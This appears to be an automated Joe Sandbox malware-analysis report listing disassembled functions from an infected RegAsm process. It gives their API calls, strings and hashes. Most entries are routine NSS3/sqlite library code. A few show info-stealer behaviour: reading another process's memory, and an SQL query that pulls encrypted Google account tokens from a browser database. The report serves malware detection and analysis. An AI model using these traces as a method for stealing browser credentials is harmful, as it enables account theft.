Instruction Fuzzy Hash: 30515831A1528A8BEF01CA6EC4927FF7BF59F46308F1C8125E8B5A7B40D335888587A1

Function 6C9D7D70 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 179COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C9D7E27
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C9D7E67
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001065F,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000003,?,?), ref: 6C9D7EED
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001066C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C9D7F2E

Strings

database corruption, xrefs: 6C9D7EE2, 6C9D7F23
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C9D7ED8, 6C9D7F08, 6C9D7F19
%s at line %d of [%.10s], xrefs: 6C9D7EE7, 6C9D7F28

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 912837312-598938438
Opcode ID: fcfeb263979ebca0d8f3bd627d0179b2d1bc789ef172fb7650471bd86941e80d
Instruction ID: 40f2398c865836f6d3a0a25ac6c8d3cf7c05d4b52d6c11a30618c8345ead1ecf
Opcode Fuzzy Hash: fcfeb263979ebca0d8f3bd627d0179b2d1bc789ef172fb7650471bd86941e80d
Instruction Fuzzy Hash: C4610774A046469FCB15CF29C880BAA3776BF45318F1685A8EC086FB5AD330FC55CBA1

Function 6C9BFCF0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 155COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124AC,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C9BFD7A
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C9BFD94
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124BF,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C9BFE3C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C9BFE83

Part of subcall function 6C9BFEC0: memcmp.VCRUNTIME140(?,?,?,?,00000000,?), ref: 6C9BFEFA
Part of subcall function 6C9BFEC0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?), ref: 6C9BFF3B

Strings

database corruption, xrefs: 6C9BFD6E, 6C9BFE30
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C9BFD64, 6C9BFE26
%s at line %d of [%.10s], xrefs: 6C9BFD73, 6C9BFE35

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log$memcmpmemcpy
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1169254434-598938438
Opcode ID: 2e3374f8fc2cd5559f7bc2c73a5dbe26972279832ff61fafbecf46c747784b74
Instruction ID: 5339dc51aad8fbc4d27aa745ca90068cacaeffb302b48ef2c17806f5f2dc637a
Opcode Fuzzy Hash: 2e3374f8fc2cd5559f7bc2c73a5dbe26972279832ff61fafbecf46c747784b74
Instruction Fuzzy Hash: 53516379A00205AFDB04CFA9D8D0AAEB7B5EF48318F144469E905BB756E731EC54CBA0

Function 0040F915 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00000000,?,00000000,00000000,?,?,?,?,?,0040FBE3,?,00000000,00000000,?,?), ref: 0040F934
VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,?,?,?,?,?,?,?,0040FBE3,?,00000000,00000000), ref: 0040F95E
ReadProcessMemory.KERNEL32(?,00000000,?,00064000,00000000,?,?,?,?,?,?,?,?), ref: 0040F9AB
ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0040FA04
VirtualQueryEx.KERNEL32(?,?,?,0000001C), ref: 0040FA5C
??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0040FBE3,?,00000000,00000000,?,?), ref: 0040FA6D

Strings

@, xrefs: 0040F977

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: MemoryProcessQueryReadVirtual
String ID: @
API String ID: 3835927879-2766056989
Opcode ID: a9495d4f72b3d1438dfa2c68789035a7ae4ab924da08034bdec0029a689f928b
Instruction ID: 782d1e78530d26aac93c20cf39dad9713f636d1ba6f6d7f846141922d26d4ee5
Opcode Fuzzy Hash: a9495d4f72b3d1438dfa2c68789035a7ae4ab924da08034bdec0029a689f928b
Instruction Fuzzy Hash: B8419D32A00209BBDF209FA5DC49FDF7B76EF44760F14803AFA04A6690D7788A55DB94

Function 6CA48CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,6CA5124D,00000001), ref: 6CA48D19
EnterCriticalSection.KERNEL32(?,?,?,?,6CA5124D,00000001), ref: 6CA48D32
PL_ArenaRelease.NSS3(?,?,?,?,?,6CA5124D,00000001), ref: 6CA48D73
PR_Unlock.NSS3(?,?,?,?,?,6CA5124D,00000001), ref: 6CA48D8C

Part of subcall function 6CADDD70: TlsGetValue.KERNEL32 ref: 6CADDD8C
Part of subcall function 6CADDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CADDDB4

PR_Unlock.NSS3(?,?,?,?,?,6CA5124D,00000001), ref: 6CA48DBA

Strings

KRAM, xrefs: 6CA48D3E
KRAM, xrefs: 6CA48CF9

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
String ID: KRAM$KRAM
API String ID: 2419422920-169145855
Opcode ID: c5d11173e891ae1be88764cf2f40d21bb3212b1a807f755233d81651c5924dba
Instruction ID: db7566fb68ffb24f5a2ccf1d6503c945a96135bc476b84f3cbafa41dfc02669c
Opcode Fuzzy Hash: c5d11173e891ae1be88764cf2f40d21bb3212b1a807f755233d81651c5924dba
Instruction Fuzzy Hash: 16217AB5A056018FCB00AF38D58465ABBF0FF45308F19C96AD999C7701EB34E885CBD1

Function 6CA6ACC0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6CA6ACE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CA6AD14
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA6AD23

Part of subcall function 6CB4D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB4D963

PR_LogPrint.NSS3(?,00000000), ref: 6CA6AD39

Strings

(CK_INVALID_HANDLE), xrefs: 6CA6AD1C
hSession = 0x%x, xrefs: 6CA6ACFE, 6CA6AD0E
C_MessageDecryptFinal, xrefs: 6CA6ACE1

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal
API String ID: 332880674-3521875567
Opcode ID: f3d8f3ea82bfeff60f83aeaaf19fc53368da7e5a2d2496c3d367e05bcec054c4
Instruction ID: ebc9a8bbfcf9ac6f1c99cdc45d17ea2805d013591e5272acdca8992f250d096e
Opcode Fuzzy Hash: f3d8f3ea82bfeff60f83aeaaf19fc53368da7e5a2d2496c3d367e05bcec054c4
Instruction Fuzzy Hash: 74212531A001A4EFDB009F65EE88B6A3376EB47319F484025E80997F51DB349C8CC692

Function 6CB40ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6CB40EE6
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6CB40EFA

Part of subcall function 6CA2AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6CA2AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB40F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB40F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB40F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB40F2B

Strings

Assertion failure: %s, at %s:%d, xrefs: 6CB40ED9, 6CB40EE5, 6CB40F06, 6CB40F0B
Aborting, xrefs: 6CB40EB3

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 2948422844-1374795319
Opcode ID: fe03256c0aaf4cfb84b758431a9001627fd7b090ea2ddd14a7a5416ea9199b07
Instruction ID: 9223031b805f73cbf7c60bd7da0939d87f3312b36e0956cb74d127f3fbcb4896
Opcode Fuzzy Hash: fe03256c0aaf4cfb84b758431a9001627fd7b090ea2ddd14a7a5416ea9199b07
Instruction Fuzzy Hash: 9201C0B6A00194BBDF01AFA4EC45CAB3F3DEF47264B008024FD0997711D635E95097A2

Function 6CB04D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CB04DC3
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB04DE0

Strings

misuse, xrefs: 6CB04DD5
API call with %s database connection pointer, xrefs: 6CB04DBD
invalid, xrefs: 6CB04DB8
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CB04DCB
%s at line %d of [%.10s], xrefs: 6CB04DDA

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 27f4aa5602e85e8b04c0c8864de1f9fe3e4c3ba5ff6c682bd803026b2373b2a8
Instruction ID: db61af0654b36aaa996f9c665ee981d3836a59852b018eddbf3bb4bb6e32092d
Opcode Fuzzy Hash: 27f4aa5602e85e8b04c0c8864de1f9fe3e4c3ba5ff6c682bd803026b2373b2a8
Instruction Fuzzy Hash: 56F0B415F145F42BDB015116DC20FC63B558F3632DF5A0AE0ED087BE62D6459C64C792

Function 6CB04DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CB04E30
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB04E4D

Strings

misuse, xrefs: 6CB04E42
API call with %s database connection pointer, xrefs: 6CB04E2A
invalid, xrefs: 6CB04E25
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CB04E38
%s at line %d of [%.10s], xrefs: 6CB04E47

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 6f6f5b7df86e346ba25a50f49969efed15d079b8f8521f8a58e4ec41de92cdc0
Instruction ID: 422f0c24caf3ba73726c77a20d86229e96b2334ddd0231f29ea8b4c1455c24ec
Opcode Fuzzy Hash: 6f6f5b7df86e346ba25a50f49969efed15d079b8f8521f8a58e4ec41de92cdc0
Instruction Fuzzy Hash: A9F08225F449E82BEB155126DC10FC63B89CB36339F5945A1EA0877EB2D605A8604692

Function 00409A0E Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 223stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

lstrlenA.KERNEL32(?), ref: 00409BB2

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

StrStrA.SHLWAPI(00000000,AccountId), ref: 00409BCF
lstrlenA.KERNEL32(?), ref: 00409C7E
lstrlenA.KERNEL32(?), ref: 00409C99

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Strings

GoogleAccounts, xrefs: 00409A37
GoogleAccounts, xrefs: 00409A8E
AccountId, xrefs: 00409BC9
SELECT service, encrypted_token FROM token_service, xrefs: 00409B1F

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$lstrcat$AllocLocal
String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
API String ID: 3306365304-1713091031
Opcode ID: 5d1fa93d8a4f8fa41f09a4a580a8de65c6950c3e537695192faeee9fdbabb43f
Instruction ID: bcd8a3c27cc20b2b0202687c0b5b9a5b34e989406908c304105e5c1fc2b99bb7
Opcode Fuzzy Hash: 5d1fa93d8a4f8fa41f09a4a580a8de65c6950c3e537695192faeee9fdbabb43f
Instruction Fuzzy Hash: 45815171E40109ABCF01FFA5DE469DD77B5AF04309F511026F900B71E2DBB8AE898B99

Function 6CA70C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(00000000,00000000,6CA71444,?,00000001,?,00000000,00000000,?,?,6CA71444,?,?,00000000,?,?), ref: 6CA70CB3

Part of subcall function 6CADC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CADC2BF

PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CA71444,?,00000001,?,00000000,00000000,?,?,6CA71444,?), ref: 6CA70DC1
PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6CA71444,?,00000001,?,00000000,00000000,?,?,6CA71444,?), ref: 6CA70DEC

Part of subcall function 6CA90F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6CA32AF5,?,?,?,?,?,6CA30A1B,00000000), ref: 6CA90F1A
Part of subcall function 6CA90F10: malloc.MOZGLUE(00000001), ref: 6CA90F30
Part of subcall function 6CA90F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CA90F42

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6CA71444,?,00000001,?,00000000,00000000,?), ref: 6CA70DFF
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6CA71444,?,00000001,?,00000000), ref: 6CA70E16
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CA71444,?,00000001,?,00000000,00000000,?), ref: 6CA70E53
PR_GetCurrentThread.NSS3(?,?,?,?,6CA71444,?,00000001,?,00000000,00000000,?,?,6CA71444,?,?,00000000), ref: 6CA70E65
PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CA71444,?,00000001,?,00000000,00000000,?), ref: 6CA70E79

Part of subcall function 6CA81560: TlsGetValue.KERNEL32(00000000,?,6CA50844,?), ref: 6CA8157A
Part of subcall function 6CA81560: EnterCriticalSection.KERNEL32(?,?,?,6CA50844,?), ref: 6CA8158F
Part of subcall function 6CA81560: PR_Unlock.NSS3(?,?,?,?,6CA50844,?), ref: 6CA815B2

Part of subcall function 6CA4B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6CA51397,00000000,?,6CA4CF93,5B5F5EC0,00000000,?,6CA51397,?), ref: 6CA4B1CB
Part of subcall function 6CA4B1A0: free.MOZGLUE(5B5F5EC0,?,6CA4CF93,5B5F5EC0,00000000,?,6CA51397,?), ref: 6CA4B1D2

Part of subcall function 6CA489E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6CA488AE,-00000008), ref: 6CA48A04
Part of subcall function 6CA489E0: EnterCriticalSection.KERNEL32(?), ref: 6CA48A15
Part of subcall function 6CA489E0: memset.VCRUNTIME140(6CA488AE,00000000,00000132), ref: 6CA48A27
Part of subcall function 6CA489E0: PR_Unlock.NSS3(?), ref: 6CA48A35

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
String ID:
API String ID: 1601681851-0
Opcode ID: 30c03aae8166da7df5bb9ef3002ce933e49e38fb6b97ecf2b5c575c40ad77b95
Instruction ID: 64bd91bfb860a4bf11b2ba18f24f9a56ab3ca799bc861ed7c3d9c9d130b592c7
Opcode Fuzzy Hash: 30c03aae8166da7df5bb9ef3002ce933e49e38fb6b97ecf2b5c575c40ad77b95
Instruction Fuzzy Hash: DF51B5BAD002005FEB109F64DE81ABB37B8AF0521CF594064ED1597702FB32ED9986B2

Function 6CA26E50 Relevance: 12.2, APIs: 8, Instructions: 189COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3(?,?), ref: 6CA26ED8
sqlite3_value_text.NSS3(?,?), ref: 6CA26EE5
memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6CA26FA8
sqlite3_value_text.NSS3(00000000,?), ref: 6CA26FDB
sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6CA26FF0
sqlite3_value_blob.NSS3(?,?), ref: 6CA27010
sqlite3_value_blob.NSS3(?,?), ref: 6CA2701D
sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6CA27052

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
String ID:
API String ID: 1920323672-0
Opcode ID: dc857cbed8683a81613aaa86d5e4ba8bbc02aa2356dc8a8facf47b19c35d4da3
Instruction ID: 22739e19d178b0a8437239bdb08723b584a0c36d7a45a1e3d7bb2915b1c4f406
